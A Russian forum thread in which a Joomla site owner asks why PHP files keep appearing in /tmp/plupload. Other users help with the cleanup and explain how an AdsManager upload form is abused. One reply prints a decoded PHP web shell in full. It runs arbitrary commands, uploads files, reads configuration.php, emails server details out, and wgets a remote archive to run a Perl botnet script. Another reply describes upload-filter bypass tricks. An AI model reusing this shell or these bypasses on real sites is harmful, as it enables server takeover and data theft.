Вирус на сайте в /tmp/plupload

@VlaDOS81 · Регистрация: 26.07.2015

Author24 — интернет-сервис помощи студентам

Добрый день.
На моем сайте постоянно в папке сайт/tmp/plupload появляются файлы типа logo.php или sesat_1.php
Кто может что-то посоветовать.
Файлы постоянно удаляю но через время появляются.
Хостинг выдает сообщения что на сайте вирус.
Сайт http://www.corporationdp.net

Во вложении одни из файлов которые обнаружил антивирус plupload.zip

P.S. извините если не туда обращаюсь. Очень нужна помощь.

@alexsamos33 · 26.07.2015, 18:50

Сообщение от VlaDOS81

На моем сайте постоянно в папке сайт/tmp/plupload появляются файлы типа logo.php или sesat_1.php

1. Вот расшифрованый код скрипта:

Decoded Output

PHP/HTML

<?php if (!isset($_SESSION['bajak'])) {
    $visitcount = 0;
    $web = $_SERVER["HTTP_HOST"];
    $inj = $_SERVER["REQUEST_URI"];
    $body = "ada yang inject 
$web$inj";
    $safem0de = @ini_get('safe_mode');
    if (!$safem0de) {
        $security = "SAFE_MODE = OFF";
    } else {
        $security = "SAFE_MODE = ON";
    };
    $serper = gethostbyname($_SERVER['SERVER_ADDR']);
    $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
    mail("ariganex8@gmail.com
/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */", "$body", "Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
    $_SESSION['bajak'] = 0;
} else {
    $_SESSION['bajak']++;
};
if (isset($_GET['clone'])) {
    $source = $_SERVER['SCRIPT_FILENAME'];
    $desti = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/SimplePie/404.phpp";
    rename($source, $desti);
}
if (isset($_GET['viar'])) {
    system("wget http://hftcommunications.com/components/com_xmap/com_xmap.zip;unzip com_xmap.zip");
}
if (isset($_GET['botnet'])) {
    system("cd com_xmap.zip;perl com_xmap.txt");
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
    $security = "SAFE_MODE : OFF";
} else {
    $security = "SAFE_MODE : ON";
}
echo "<title>Arhy - Shell</title><br>";
echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";
function pwd() {
    $cwd = getcwd();
    if ($u = strrpos($cwd, '/')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '/';
        } else {
            return $cwd;
        };
    } elseif ($u = strrpos($cwd, '\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo ' < formmethod = "POST"action = "" > < fontsize = 2color = #888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
    echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
    if (isset($_POST['submit'])) {
        $uploaddir = pwd();
        if (!$name = $_POST['newname']) {
            $name = $_FILES['userfile']['name'];
        };
        move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
            echo "Upload Failed";
        } else {
            echo "Upload Success to " . $uploaddir . $name . " :P ";
        }
    }
    if (isset($_POST['command'])) {
        $cmd = $_POST['cmd'];
        echo "<pre><font size=3 color=#000000>" . shell_exec($cmd) . "</font></pre>";
    } elseif (isset($_GET['cmd'])) {
        $comd = $_GET['cmd'];
        echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>";
    } elseif (isset($_GET['rf'])) {
        $rf = file_get_contents("../../../../../configuration.php");
        echo $rf;
    } else {
        echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>";
    }

2. Возможно у вас на сайте есть форма для загрузки файлов (например картинок).
Если такая форма для загрузки файлов есть, то надо очень строго фильтровать загружаемые файлы по типу, содержимому и расширению. Если что-то не так, то не разрешать загрузку такого файла.

@VlaDOS81 · 26.07.2015, 21:53 **[ТС]**

У меня на сайте используется Adsmanager 2.7.0 Stable там действительно есть форма для загрузки картинок и там когда пробуешь загрузить какой либо иной фал не картинку то не дает как при перетаскивании так и при выборе файла.
Я сам тестировал несколько раз.

А вот код смотрю ссылается на компонент com_xmap я вот думаю может его вообще отключить или удалить.
Не пойму где дырка в сайте....

@alexsamos33 · 26.07.2015, 22:11

Сообщение от VlaDOS81

и там когда пробуешь загрузить какой либо иной фал не картинку то не дает как при перетаскивании так и при выборе файла.

А вы через сниффер запрос подмените, я думаю результат будет положительный.
Или связанные события через консоль браузера javascript элементы отключить... Вот я думаю получится.
Проверка типа файла должна быть на сервере.

Добавлено через 1 минуту
Или добавьте несколько байтов от картинки, а далее ваш файлик.

@VlaDOS81 · 26.07.2015, 22:41 **[ТС]**

я не совсем разбираюсь в том что вы мне посоветовали но на хостинге мне ответили так:
Данное ограничение Вы можете настроить средствами Вашей CMS
В настройках хостинга данная возможность не реализована

теперь вопрос где это в Joomla 2.5.9 можно настроить?

@Taatshi · 27.07.2015, 00:04

VlaDOS81, Вам нужно не настройкой движка заниматься, а искать каким образом заливают эти файлы. Зуб даю - на хостинге у вас есть бэкдор.

Прогоните сайт манулом и посмотрите что он скажет.

@VlaDOS81 · 27.07.2015, 00:53 **[ТС]**

Спасибо за совет. Вот что получилось... в архиве scan_log.xml.zip

@VlaDOS81 · 28.07.2015, 10:20 **[ТС]**

Короче манул нашел залитые файлы и отметил как вирус красным и еще около 300 желтым и все

Добавлено через 12 минут
попробовал запустить фал из сайта
http://www.corporationdp.net/tmp/plupload/mil.php

получается что таким образом можно залить любой файл

@VlaDOS81 · 28.07.2015, 10:29 **[ТС]**

вот скрин

@VlaDOS81 · 28.07.2015, 10:37 **[ТС]**

вот ссылка на архив https://yadi.sk/d/Kc8q4gSgi8MYj

@Taatshi · 29.07.2015, 17:43

VlaDOS81, Вы зря выкладываете архив в общий доступ. В нем находится информация, критичная для безопасности Вашего сайта.

Просто глянуть тут не получится - это нужно сидеть и работать. Если сами не знаете что делать с логами - ищите спецов, которые знают. Там не на один час, а, может, и день, работы.

@VlaDOS81 · 30.07.2015, 10:49 **[ТС]**

архив удалил

Добавлено через 16 часов 51 минуту
как думаете, для временного решения если на заливаемые файлы установить права доступа 000 для исключения их исполнения? Поможет это?

@Taatshi · 30.07.2015, 11:26

VlaDOS81, тогда сайт работать не будет)

@VlaDOS81 · 30.07.2015, 11:28 **[ТС]**

я так сделал на залитые файлы а tmp = 700
вроде все работатет

@Taatshi · 30.07.2015, 12:49

VlaDOS81,если вирус УЖЕ прописан в файлах - с этого никакого толку не будет.

@VlaDOS81 · 31.07.2015, 13:54 **[ТС]**

вот нашел тему по своему вопросу https://revisium.com/ru/blog/adsmanager_afu.html

@Taatshi · 31.07.2015, 14:02

VlaDOS81, если у Вашего хостера нет бэков без вируса - обратитесь в Ревизиум для платной помощи. Они сделают как надо.

Если есть - развернуть бэк и немедленно выполнить все рекомендации по адресу, который Вы привели.

@VlaDOS81 · 31.07.2015, 14:09 **[ТС]**

На моем хосте лечением занимаются только сами клиенты.
Думаю поставить еще на сайт RSFirewall, что скажете?

@VlaDOS81 0 / 0 / 0 Регистрация: 26.07.2015 Сообщений: 11
	26.07.2015, 21:53 [ТС]	3
	У меня на сайте используется Adsmanager 2.7.0 Stable там действительно есть форма для загрузки картинок и там когда пробуешь загрузить какой либо иной фал не картинку то не дает как при перетаскивании так и при выборе файла. Я сам тестировал несколько раз. А вот код смотрю ссылается на компонент com_xmap я вот думаю может его вообще отключить или удалить. Не пойму где дырка в сайте.... 0

@alexsamos33 669 / 640 / 335 Регистрация: 26.04.2014 Сообщений: 2,122
	26.07.2015, 22:11	4
	Сообщение от VlaDOS81 и там когда пробуешь загрузить какой либо иной фал не картинку то не дает как при перетаскивании так и при выборе файла. А вы через сниффер запрос подмените, я думаю результат будет положительный. Или связанные события через консоль браузера javascript элементы отключить... Вот я думаю получится. Проверка типа файла должна быть на сервере. Добавлено через 1 минуту Или добавьте несколько байтов от картинки, а далее ваш файлик. 0

@VlaDOS81 0 / 0 / 0 Регистрация: 26.07.2015 Сообщений: 11
	26.07.2015, 22:41 [ТС]	5
	я не совсем разбираюсь в том что вы мне посоветовали но на хостинге мне ответили так: Данное ограничение Вы можете настроить средствами Вашей CMS В настройках хостинга данная возможность не реализована теперь вопрос где это в Joomla 2.5.9 можно настроить? 0

@Taatshi Почетный модератор 12271 / 5336 / 268 Регистрация: 05.04.2011 Сообщений: 14,086 Записей в блоге: 2
	27.07.2015, 00:04	6
	VlaDOS81, Вам нужно не настройкой движка заниматься, а искать каким образом заливают эти файлы. Зуб даю - на хостинге у вас есть бэкдор. Прогоните сайт манулом и посмотрите что он скажет. 0

@VlaDOS81 0 / 0 / 0 Регистрация: 26.07.2015 Сообщений: 11
	27.07.2015, 00:53 [ТС]	7
	Спасибо за совет. Вот что получилось... в архиве scan_log.xml.zip 0

@VlaDOS81 0 / 0 / 0 Регистрация: 26.07.2015 Сообщений: 11
	28.07.2015, 10:20 [ТС]	8
	Короче манул нашел залитые файлы и отметил как вирус красным и еще около 300 желтым и все Добавлено через 12 минут попробовал запустить фал из сайта http://www.corporationdp.net/tmp/plupload/mil.php получается что таким образом можно залить любой файл 0

@VlaDOS81 0 / 0 / 0 Регистрация: 26.07.2015 Сообщений: 11
	28.07.2015, 10:29 [ТС]	9
	вот скрин Миниатюры 0

@VlaDOS81 0 / 0 / 0 Регистрация: 26.07.2015 Сообщений: 11
	28.07.2015, 10:37 [ТС]	10
	вот ссылка на архив https://yadi.sk/d/Kc8q4gSgi8MYj 0

@Taatshi Почетный модератор 12271 / 5336 / 268 Регистрация: 05.04.2011 Сообщений: 14,086 Записей в блоге: 2
	29.07.2015, 17:43	11
	VlaDOS81, Вы зря выкладываете архив в общий доступ. В нем находится информация, критичная для безопасности Вашего сайта. Просто глянуть тут не получится - это нужно сидеть и работать. Если сами не знаете что делать с логами - ищите спецов, которые знают. Там не на один час, а, может, и день, работы. 0

@VlaDOS81 0 / 0 / 0 Регистрация: 26.07.2015 Сообщений: 11
	30.07.2015, 10:49 [ТС]	12
	архив удалил Добавлено через 16 часов 51 минуту как думаете, для временного решения если на заливаемые файлы установить права доступа 000 для исключения их исполнения? Поможет это? 0

	31.07.2015, 14:09

@Taatshi Почетный модератор 12271 / 5336 / 268 Регистрация: 05.04.2011 Сообщений: 14,086 Записей в блоге: 2
	30.07.2015, 11:26	13
	VlaDOS81, тогда сайт работать не будет) 0

@VlaDOS81 0 / 0 / 0 Регистрация: 26.07.2015 Сообщений: 11
	30.07.2015, 11:28 [ТС]	14
	я так сделал на залитые файлы а tmp = 700 вроде все работатет 0

@Taatshi Почетный модератор 12271 / 5336 / 268 Регистрация: 05.04.2011 Сообщений: 14,086 Записей в блоге: 2
	30.07.2015, 12:49	15
	VlaDOS81,если вирус УЖЕ прописан в файлах - с этого никакого толку не будет. 0

@VlaDOS81 0 / 0 / 0 Регистрация: 26.07.2015 Сообщений: 11
	31.07.2015, 13:54 [ТС]	16
	вот нашел тему по своему вопросу https://revisium.com/ru/blog/adsmanager_afu.html 0

@Taatshi Почетный модератор 12271 / 5336 / 268 Регистрация: 05.04.2011 Сообщений: 14,086 Записей в блоге: 2
	31.07.2015, 14:02	17
	VlaDOS81, если у Вашего хостера нет бэков без вируса - обратитесь в Ревизиум для платной помощи. Они сделают как надо. Если есть - развернуть бэк и немедленно выполнить все рекомендации по адресу, который Вы привели. 0

@VlaDOS81 0 / 0 / 0 Регистрация: 26.07.2015 Сообщений: 11
	31.07.2015, 14:09 [ТС]	18
	На моем хосте лечением занимаются только сами клиенты. Думаю поставить еще на сайт RSFirewall, что скажете? 0